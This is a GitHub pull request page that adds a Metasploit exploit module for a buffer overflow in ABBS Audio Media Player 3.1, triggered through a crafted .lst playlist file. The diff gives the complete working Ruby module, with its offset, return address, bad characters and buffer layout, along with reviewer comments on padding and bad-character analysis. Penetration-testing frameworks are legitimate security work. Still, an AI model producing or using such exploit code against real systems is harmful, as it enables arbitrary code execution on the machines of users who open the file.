Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added abbs amp exploit module #2038

Merged
merged 7 commits into from
Jul 2, 2013
Merged

Added abbs amp exploit module #2038

Changes from 4 commits
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
1e4b69a
Added abbs amp exploit module
modpr0be Jun 30, 2013
007fddb
remove SEH function, not needed
modpr0be Jun 30, 2013
f16d097
clean version, tested on winxp sp3 and win7 sp1
modpr0be Jul 1, 2013
478beee
remove unnecessary option and make msftidy happy
modpr0be Jul 1, 2013
c631778
make a nice way to fill the rest of buffer
modpr0be Jul 1, 2013
9b8bfa6
change last junk from rand_text_alpha_upper to rand_text
modpr0be Jul 1, 2013
2e53984
remove additional junk, tested and not needed
modpr0be Jul 2, 2013
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
73 changes: 73 additions & 0 deletions modules/exploits/windows/fileformat/abbs_amp_lst.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'ABBS Audio Media Player .LST Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
occurs when adding an .lst, allowing arbitrary code execution with the privileges
of the user running the application . This module has been tested successfully on
ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Julian Ahrens', # Vulnerability discovery and PoC
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '75096' ],
[ 'EDB', '25204' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
},
'Targets' =>
[
[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is "\x00" a badchar bat can be used in the ret? I have not done badchars analysis by myself, just asking because sounds strange.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ah yes, i forgot to remove the \x00 bad char. It doesn't affect the stack after all.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

after a bit research, we still need the \x00 to be in badChars list to make the exploit works. Please see my latest commit 478beee

'Offset' => 4108
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 30 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
], self.class)

end

def exploit
buffer = payload.encoded
buffer << rand_text(target['Offset'] - (payload.encoded.length))
buffer << [target.ret].pack('V')
buffer << rand_text_alpha_upper(800)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

can you use rand_text here? Sounds like if badchars analysis is accure, you should be able to do it with rand_text.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've done badchars analysis, badchars are "\x00\0a\x0d". The weird thing is, If the ret address contains null, it still works anyway. The amp.exe is the only module that we can use to make the exploit reliable across platform. Any suggestions on this?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Where did the 800 suffix padding length come from? And why is it not dependent on the length of anything else in the buffer?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The 800 chars padding was added to fill the buffer and trigger the overflow. Is there any nice way to fill the buffer?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Well, that would be clearer if you had a constant like OVERFLOW_LENGTH that then calculated the fill length by doing

overflow_fill = OVERFLOW_LENGTH - buffer.length
buffer << rand_text_alpha_upper(overflow_fill)

That way the overflow will always be correct if the encoded payload were shorter than expected for some reason. It would also let you experiment to see what is the shortest length you can use to trigger the overflow so you can send a smaller exploit.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ah yes, ok I'll experiment with the buffer length and try to include your suggestion. Thanks! 👍


file_create(buffer)
end
end